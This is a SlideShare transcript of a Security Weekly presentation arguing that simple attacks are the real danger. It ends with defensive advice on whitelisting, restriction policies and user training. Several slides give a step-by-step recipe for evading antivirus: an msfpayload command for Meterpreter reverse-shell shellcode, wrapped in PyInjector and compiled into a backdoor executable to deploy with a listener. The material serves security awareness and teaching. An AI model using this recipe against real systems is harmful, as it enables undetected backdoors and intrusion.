SlideShare une entreprise Scribd logo

Give Me Three Things: Anti-Virus Bypass Made Easy

Télécharger en tant que PPT, PDF
Security Weekly
Security Weekly

John Strand shows us 3 simple AV Bypass Techniques!

Technologie
1  sur  30
Security Weekly™ Presents: Give Me Three Things Sometimes, three is bad http://securityweekly.com
Brought To You By: consulting@blackhillsinfosec.com
The Need for Focus • It is easy to get caught up in the latest “Hack of the day” • Let’s talk about • iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X • But, when we get popped, it is going to be something simple • Cool stuff is cool, but the basics will kill you http://hacknaked.tv Copyright 2013
#1 Crappy Malware • Had enough presentations on the “Not so advanced persistent threat?” • Somehow, the belief is if we can make fun of the attackers skill level it makes us….??? • Better? Smarter? • Why? • Because….. http://hacknaked.tv Copyright 2013
Results Matter http://hacknaked.tv Copyright 2013
About that Malware • It tends to be well known • It tends to have AV signatures* • Tracing it back to a specific group can be hard • Anyone can download it • It is not 1337 or even 31337 Just right http://hacknaked.tv Copyright 2013
Poison Ivy http://hacknaked.tv Copyright 2013
Citadel http://hacknaked.tv Copyright 2013
AV Bypass Made Easy • Many of these tools have options to export to a raw string of hex characters • In fact, that does not even matter • We can use Ghost Writing techniques • Simply exporting and re-importing as a script does the trick • Flame did this with Lua This and cookies: Why I pentest http://hacknaked.tv Copyright 2013
Ghost Writing: Creating the Binary http://hacknaked.tv Copyright 2013
Converting to Assembly http://hacknaked.tv Copyright 2013
Editing the Assembly http://hacknaked.tv Copyright 2013
Finalize the Payload http://hacknaked.tv Copyright 2013
Python Injection • Another technique is to: • Convert your payload into Raw output • Import the Raw output into a python script • Convert the Python script into an executable • It is all because the text sections of an .exe not being reviewed by many AV vendors • They would have to write the signature for Python itself • Not likely • Great write up by Mark Baggett • http://tinyurl.com/SANS-580-Python-AV-Bypass http://hacknaked.tv Copyright 2013
Windows AV Bypass - Setup • Create a Windows box with prerequisites • Same as target (32-bit vs. 64-bit) • Install Python: http://www.python.org/ • Add Python to system PATH • Install PyWin32: http://sourceforge.net/projects/pywin32/ • Install PyInstaller: http://www.pyinstaller.org/ • Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip http://hacknaked.tv Copyright 2013
Windows AV Bypass - Config • Extract files from PyInjector • Move pyinjector.py into root of PyInstaller folder • Use msfpayload to generate alphanumeric shellcode (on any machine) • msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d http://hacknaked.tv Copyright 2013 'n' | more • Make sure payload matches architecture! • Within pyinjector.py: • replace: shellcode = sys.argv[1] • with: shellcode = '<msfpayload output>’ • where: <msfpayload output> = output from the above msfpayload command
Windows AV Bypass - Compile • While in the PyInstaller Directory: • python utilsMakespec.py --onefile --noconsole pyinjector.py • python utilsBuild.py pyinjector/pyinjector.spec • New backdoor should be under: • [PyInstaller]/pyinjector/dist/pyinjector.exe • Rename the executable, deploy, profit • Don’t forget your listener!!! http://hacknaked.tv Copyright 2013
Or You Could Just Choose Option 15 OOppttioionn 1155 http://hacknaked.tv Copyright 2013
#2 0-day Dejour • Yeah, another favorite for attackers • There is always another 0-day • Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective • Why? Because it works • They do a lot with volume • What is your patch success percentage? http://hacknaked.tv Copyright 2013
Lessons • Black-list AV is easy to bypass • In fact, we had to do it with Poison Ivy last week • Yeah, a piece of malware 5 years old • The attackers will be exactly as advanced as they need to be • Which is not very advanced http://hacknaked.tv Copyright 2013
Focus and Future Plans • Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system • Get away from Black List Security • Now • Right now • .. I mean after this presentation http://hacknaked.tv Copyright 2013
#3 Users Making “Mistakes” • How could we have a presentation without this? • There is no way hackers would be this successful without users • Ha Ha!!! Users are “dumb” • Yeah.. • Right? • Not so fast sparky http://hacknaked.tv Copyright 2013
We are all Dumb • Or, the pretexts for the attackers are getting really, really good • Some SE pretexts we use are not fair • Major insurance company and a change of coverage • Linked-in merit badges • If the attack is tailored, it is successful http://hacknaked.tv Copyright 2013
Caller ID Spoofing http://hacknaked.tv Copyright 2013
Hail Pentest Geek! http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/ http://hacknaked.tv Copyright 2013
Lessons • Users are going to make mistakes • Not because they are dumb • Well, half of them are below average • Because they are not trained • And because the attackers are good http://hacknaked.tv Copyright 2013
Focus and Future Plans • Hacker Guard Lesson: Once again, focus on attacker actions • Limit the damage the user can do • Implement Firewalls • Implement Software Restriction Policies • Implement Internet Whitelisting • But don’t simply believe the user is stupid • Train them: Securing the Human http://hacknaked.tv Copyright 2013
Conclusions • While bright shiny objects are bright and shiny • We need to come back to basics and fundamentals • We loose sight of that in this industry http://hacknaked.tv Copyright 2013
OCM at Black Hat • Offensive Countermeasures at Black Hat 2013 • http://tinyurl.com/HN TV-BH-2013 http://hacknaked.tv Copyright 2013
End of Line • Hack Naked TV Episodes • http://www.hacknaked.tv • Watch us: • Blip.tv: http://blip.tv/securityweekly • YouTube: http://youtube.com/securityweeklytv • Subscribe via iTunes: • https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2 http://hacknaked.tv Copyright 2013

Recommandé

Pwn phone2014 jrs
Pwn phone2014 jrsPwn phone2014 jrs
Pwn phone2014 jrsSecurity Weekly
 
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Security Weekly
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListSecurity Weekly
 
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014Security Weekly
 
Let's Hack a House
Let's Hack a HouseLet's Hack a House
Let's Hack a HouseSynack
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedZoltan Balazs
 
Getting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionGetting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionJoe McCray
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 

Recommandé

Pwn phone2014 jrs
Pwn phone2014 jrsPwn phone2014 jrs
Pwn phone2014 jrsSecurity Weekly
 
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Security Weekly
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListSecurity Weekly
 
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014Security Weekly
 
Let's Hack a House
Let's Hack a HouseLet's Hack a House
Let's Hack a HouseSynack
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedZoltan Balazs
 
Getting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionGetting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionJoe McCray
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Duo Security
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsJoe McCray
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedJoe McCray
 
Building a low cost hack lab
Building a low cost hack labBuilding a low cost hack lab
Building a low cost hack labJoe McCray
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
So you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howSo you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howJoe McCray
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPWireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPJoe McCray
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON
 
Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...LINE Corporation
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNorth Texas Chapter of the ISSA
 
RPS/APS vulnerability in snom/yealink and others - slides
RPS/APS vulnerability in snom/yealink and others - slidesRPS/APS vulnerability in snom/yealink and others - slides
RPS/APS vulnerability in snom/yealink and others - slidesCal Leeming
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaYogesh Ojha
 
FMK2014 FileMaker Security and Database Encryption by Jon Thatcher
FMK2014 FileMaker Security and Database Encryption by Jon ThatcherFMK2014 FileMaker Security and Database Encryption by Jon Thatcher
FMK2014 FileMaker Security and Database Encryption by Jon ThatcherVerein FM Konferenz
 
Cybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection serverCybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection serverAmit Serper
 
terry-gilsenan-pie-operating.10433
terry-gilsenan-pie-operating.10433terry-gilsenan-pie-operating.10433
terry-gilsenan-pie-operating.10433Terry Gilsenan
 
YOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS ApplicationsYOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS Applicationseightbit
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareCybereason
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON
 
How To Do A Podcast - Bsides RI 2013
How To Do A Podcast - Bsides RI 2013How To Do A Podcast - Bsides RI 2013
How To Do A Podcast - Bsides RI 2013Security Weekly
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Security Weekly
 

Contenu connexe

Tendances

Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Duo Security
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsJoe McCray
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedJoe McCray
 
Building a low cost hack lab
Building a low cost hack labBuilding a low cost hack lab
Building a low cost hack labJoe McCray
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
So you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howSo you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howJoe McCray
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPWireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPJoe McCray
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON
 
Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...LINE Corporation
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNorth Texas Chapter of the ISSA
 
RPS/APS vulnerability in snom/yealink and others - slides
RPS/APS vulnerability in snom/yealink and others - slidesRPS/APS vulnerability in snom/yealink and others - slides
RPS/APS vulnerability in snom/yealink and others - slidesCal Leeming
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaYogesh Ojha
 
FMK2014 FileMaker Security and Database Encryption by Jon Thatcher
FMK2014 FileMaker Security and Database Encryption by Jon ThatcherFMK2014 FileMaker Security and Database Encryption by Jon Thatcher
FMK2014 FileMaker Security and Database Encryption by Jon ThatcherVerein FM Konferenz
 
Cybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection serverCybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection serverAmit Serper
 
terry-gilsenan-pie-operating.10433
terry-gilsenan-pie-operating.10433terry-gilsenan-pie-operating.10433
terry-gilsenan-pie-operating.10433Terry Gilsenan
 
YOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS ApplicationsYOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS Applicationseightbit
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareCybereason
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON
 

Tendances (20)

Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security Environments
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got Owned
 
Building a low cost hack lab
Building a low cost hack labBuilding a low cost hack lab
Building a low cost hack lab
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
So you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howSo you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you how
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPWireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEP
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?
 
Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...Life as an enterprise security geek from underground. (What enterprises want ...
Life as an enterprise security geek from underground. (What enterprises want ...
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
 
RPS/APS vulnerability in snom/yealink and others - slides
RPS/APS vulnerability in snom/yealink and others - slidesRPS/APS vulnerability in snom/yealink and others - slides
RPS/APS vulnerability in snom/yealink and others - slides
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh Ojha
 
FMK2014 FileMaker Security and Database Encryption by Jon Thatcher
FMK2014 FileMaker Security and Database Encryption by Jon ThatcherFMK2014 FileMaker Security and Database Encryption by Jon Thatcher
FMK2014 FileMaker Security and Database Encryption by Jon Thatcher
 
Cybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection serverCybereason - behind the HackingTeam infection server
Cybereason - behind the HackingTeam infection server
 
terry-gilsenan-pie-operating.10433
terry-gilsenan-pie-operating.10433terry-gilsenan-pie-operating.10433
terry-gilsenan-pie-operating.10433
 
YOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS ApplicationsYOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS Applications
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection
 

En vedette

How To Do A Podcast - Bsides RI 2013
How To Do A Podcast - Bsides RI 2013How To Do A Podcast - Bsides RI 2013
How To Do A Podcast - Bsides RI 2013Security Weekly
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Security Weekly
 
unidad estudio de la web
unidad estudio de la webunidad estudio de la web
unidad estudio de la webJeffer Ramos
 
Investigacion2 hoja de calculo
Investigacion2 hoja de calculoInvestigacion2 hoja de calculo
Investigacion2 hoja de calculoJeffer Ramos
 
Qatar Presentation
Qatar PresentationQatar Presentation
Qatar Presentationguestef71b3
 
He thong hochiki fire net
He thong hochiki fire netHe thong hochiki fire net
He thong hochiki fire netTuan Vu
 
Pensieri bovini di una mucca che si fa domande
Pensieri bovini di una mucca che si fa domandePensieri bovini di una mucca che si fa domande
Pensieri bovini di una mucca che si fa domandeRPMcMurphy
 
Winter Kokoli What Bear Grylls can’t do
Winter Kokoli What Bear Grylls can’t doWinter Kokoli What Bear Grylls can’t do
Winter Kokoli What Bear Grylls can’t doethan tussey
 
Darius english powerpoint
Darius english powerpointDarius english powerpoint
Darius english powerpointdelliott22
 
DIGITAL STRATEGY
DIGITAL STRATEGY DIGITAL STRATEGY
DIGITAL STRATEGY Mei Yuan
 
storia di un'obiezione di coscienza
storia di un'obiezione di coscienzastoria di un'obiezione di coscienza
storia di un'obiezione di coscienzaRPMcMurphy
 
Vernissage Improbable Citoyen ★ Exposition d'Art Effectual
Vernissage Improbable Citoyen ★ Exposition d'Art EffectualVernissage Improbable Citoyen ★ Exposition d'Art Effectual
Vernissage Improbable Citoyen ★ Exposition d'Art EffectualJean-Baptiste Say Institute
 
Una storia vera
Una storia veraUna storia vera
Una storia veraRPMcMurphy
 

En vedette (19)

How To Do A Podcast - Bsides RI 2013
How To Do A Podcast - Bsides RI 2013How To Do A Podcast - Bsides RI 2013
How To Do A Podcast - Bsides RI 2013
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
 
unidad estudio de la web
unidad estudio de la webunidad estudio de la web
unidad estudio de la web
 
Impacto web 3.0
Impacto web 3.0Impacto web 3.0
Impacto web 3.0
 
Educational justice
Educational justiceEducational justice
Educational justice
 
PPP for Infrastructure Projects
PPP for Infrastructure ProjectsPPP for Infrastructure Projects
PPP for Infrastructure Projects
 
Investigacion2 hoja de calculo
Investigacion2 hoja de calculoInvestigacion2 hoja de calculo
Investigacion2 hoja de calculo
 
Glutamato
Glutamato Glutamato
Glutamato
 
FINAL PROJECT
FINAL PROJECTFINAL PROJECT
FINAL PROJECT
 
Qatar Presentation
Qatar PresentationQatar Presentation
Qatar Presentation
 
Gamer gate
Gamer gateGamer gate
Gamer gate
 
He thong hochiki fire net
He thong hochiki fire netHe thong hochiki fire net
He thong hochiki fire net
 
Pensieri bovini di una mucca che si fa domande
Pensieri bovini di una mucca che si fa domandePensieri bovini di una mucca che si fa domande
Pensieri bovini di una mucca che si fa domande
 
Winter Kokoli What Bear Grylls can’t do
Winter Kokoli What Bear Grylls can’t doWinter Kokoli What Bear Grylls can’t do
Winter Kokoli What Bear Grylls can’t do
 
Darius english powerpoint
Darius english powerpointDarius english powerpoint
Darius english powerpoint
 
DIGITAL STRATEGY
DIGITAL STRATEGY DIGITAL STRATEGY
DIGITAL STRATEGY
 
storia di un'obiezione di coscienza
storia di un'obiezione di coscienzastoria di un'obiezione di coscienza
storia di un'obiezione di coscienza
 
Vernissage Improbable Citoyen ★ Exposition d'Art Effectual
Vernissage Improbable Citoyen ★ Exposition d'Art EffectualVernissage Improbable Citoyen ★ Exposition d'Art Effectual
Vernissage Improbable Citoyen ★ Exposition d'Art Effectual
 
Una storia vera
Una storia veraUna storia vera
Una storia vera
 

Similaire à Give Me Three Things: Anti-Virus Bypass Made Easy

[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...CODE BLUE
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsn|u - The Open Security Community
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface DevicePositive Hack Days
 
Windows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beWindows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beMichael Gough
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdNipun Jaswal
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Juniper Networks
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 
Rooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDRooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDDaniel Garcia (a.k.a cr0hn)
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationSatria Ady Pradana
 
Green Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject DetailsGreen Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject DetailsOlivier Philippot
 
ProdSec: A Technical Approach
ProdSec: A Technical ApproachProdSec: A Technical Approach
ProdSec: A Technical ApproachJeremy Brown
 
There’s an OpenBullet Attack Config for Your Site – What Should You Do?
There’s an OpenBullet Attack Config for Your Site – What Should You Do?There’s an OpenBullet Attack Config for Your Site – What Should You Do?
There’s an OpenBullet Attack Config for Your Site – What Should You Do?DevOps.com
 
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp
 
Using Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyUsing Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyHorea Porutiu
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best PracticesRobert Vidal
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
Enter The back|track Linux Dragon
Enter The back|track Linux DragonEnter The back|track Linux Dragon
Enter The back|track Linux DragonAndrew Kozma
 
Security at Greenhouse
Security at GreenhouseSecurity at Greenhouse
Security at GreenhouseMichael O'Neil
 

Similaire à Give Me Three Things: Anti-Virus Bypass Made Easy (20)

[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
Windows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beWindows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to be
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
